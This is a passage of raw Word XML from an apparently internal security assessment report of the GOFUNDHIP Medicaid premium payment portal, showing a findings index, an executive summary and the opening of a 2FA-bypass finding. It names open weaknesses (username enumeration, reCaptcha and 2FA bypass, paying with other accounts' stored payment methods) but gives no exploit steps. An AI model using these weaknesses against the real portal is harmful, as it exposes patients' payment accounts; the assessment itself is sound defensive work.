                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703675 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>21</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="48273FDD" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703676" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>L3 – Missing Safeguard: HTTP Strict Transport Security (HSTS) Header – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703676 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>22</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="24C9EC5C" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703677" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>L4 – Missing Safeguard: Content-Type Options Header – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703677 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>24</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="717D4E8D" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703678" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>L5 – Sensitive Information Disclosure – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703678 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>25</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="6F3B5BD9" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703679" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>L6 – Missing Safeguard:  Cache Controls Not Set – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703679 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>26</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="533F91EF" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC1"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703680" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:i/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>Informational Findings</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703680 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>27</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="48CE72A3" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703681" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>I1 – Cross Origin Resource Sharing (CORS) – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703681 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>27</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="7228D90F" w14:textId="77777777" w:rsidR="000A5DB8" w:rsidRPr="00397EF0" w:rsidRDefault="000A5DB8" w:rsidP="005F4867">
                <w:r w:rsidRPr="00397EF0">
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60E743BA" w14:textId="77777777" w:rsidR="000344DD" w:rsidRPr="00397EF0" w:rsidRDefault="000344DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231E301B" w14:textId="77777777" w:rsidR="000344DD" w:rsidRPr="00397EF0" w:rsidRDefault="000344DD" w:rsidP="004E5E18">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="both"/>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0000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0420" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9828"/>
      </w:tblGrid>
      <w:tr w:rsidR="005520E7" w:rsidRPr="00397EF0" w14:paraId="1C3CEC11" w14:textId="77777777" w:rsidTr="00797F97">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9828" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
          </w:tcPr>
          <w:p w14:paraId="5828471C" w14:textId="77777777" w:rsidR="005520E7" w:rsidRPr="00397EF0" w:rsidRDefault="004C6578" w:rsidP="007538FF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005520E7" w:rsidRPr="00397EF0" w14:paraId="7D12CCD4" w14:textId="77777777" w:rsidTr="00797F97">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9828" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="68391B6B" w14:textId="77777777" w:rsidR="00B5217F" w:rsidRPr="00397EF0" w:rsidRDefault="00F54A33" w:rsidP="00B5217F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DDD081" w14:textId="77777777" w:rsidR="00615FDF" w:rsidRPr="00397EF0" w:rsidRDefault="00615FDF" w:rsidP="00CA577C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>This is a point</w:t>
            </w:r>
            <w:r w:rsidR="004C246C" w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r w:rsidR="004C246C" w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00F03F96">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">time assessment of the GOFUNDHIP application </w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">asserted by the </w:t>
            </w:r>
            <w:r w:rsidR="001664A1" w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">development </w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>team through online meeting review</w:t>
            </w:r>
            <w:r w:rsidR="00794DA6" w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>s of the proposed</w:t>
            </w:r>
            <w:r w:rsidR="00FD48D4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> solution set. During testing, it was identified that functionality </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>existed</w:t>
            </w:r>
            <w:r w:rsidR="00FD48D4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> allowing for username enumeration, and the ability to bypass security controls such as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00FD48D4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>reCaptcha</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00FD48D4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> and two-factor authentication. Additionally, users are able to </w:t>
            </w:r>
            <w:r w:rsidR="00FD48D4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">submit payments utilizing other accounts stored payment methods and bypass Anthem approved password policy. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6594CFA2" w14:textId="77777777" w:rsidR="00B178C0" w:rsidRDefault="00B178C0" w:rsidP="00D51F51">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18EE73EA" w14:textId="77777777" w:rsidR="00D51F51" w:rsidRPr="00397EF0" w:rsidRDefault="00D51F51" w:rsidP="00D51F51">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Technical</w:t>
            </w:r>
            <w:r w:rsidR="00861512" w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> Use Case </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EE1875E" w14:textId="77777777" w:rsidR="005E6486" w:rsidRPr="00F03F96" w:rsidRDefault="00F03F96" w:rsidP="00605A87">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F03F96">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The purpose of</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> the GOFUNDHIP Payment Portal application is to cater</w:t>
            </w:r>
            <w:r w:rsidR="00605A87">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> to third-party organizations, allowing them</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> make monthly premium payments for Indiana Medicaid users.</w:t>
            </w:r>
            <w:r w:rsidR="00605A87">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> The third-party users may select to submit payment via stored or one-time only credit cards, savings, or checking accounts. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5548DD3F" w14:textId="77777777" w:rsidR="004B7AE8" w:rsidRPr="00397EF0" w:rsidRDefault="004B7AE8" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675C9A05" w14:textId="77777777" w:rsidR="00B86346" w:rsidRPr="00397EF0" w:rsidRDefault="00B86346">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D8D60" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00304781">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA3D827" w14:textId="3A8674CE" w:rsidR="00CF0DE5" w:rsidRPr="002720C7" w:rsidRDefault="00304781" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc10703664"/>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>High-Risk Findings</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="HighFindings"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="13A7BAA3" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AA83FE3" w14:textId="3A376E66" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="002720C7" w:rsidP="005F0119">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="_Toc10703665"/>
            <w:r>
              <w:t>H1</w:t>
            </w:r>
            <w:r w:rsidR="00983E25" w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidR="00983E25">
              <w:t xml:space="preserve">Security Control Bypass </w:t>
            </w:r>
            <w:r w:rsidR="005F0119">
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="00983E25">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F0119">
              <w:t>2FA</w:t>
            </w:r>
            <w:r w:rsidR="00983E25" w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidR="00983E25">
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="3"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1D3B1014" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24AFCA85"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F918DA" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
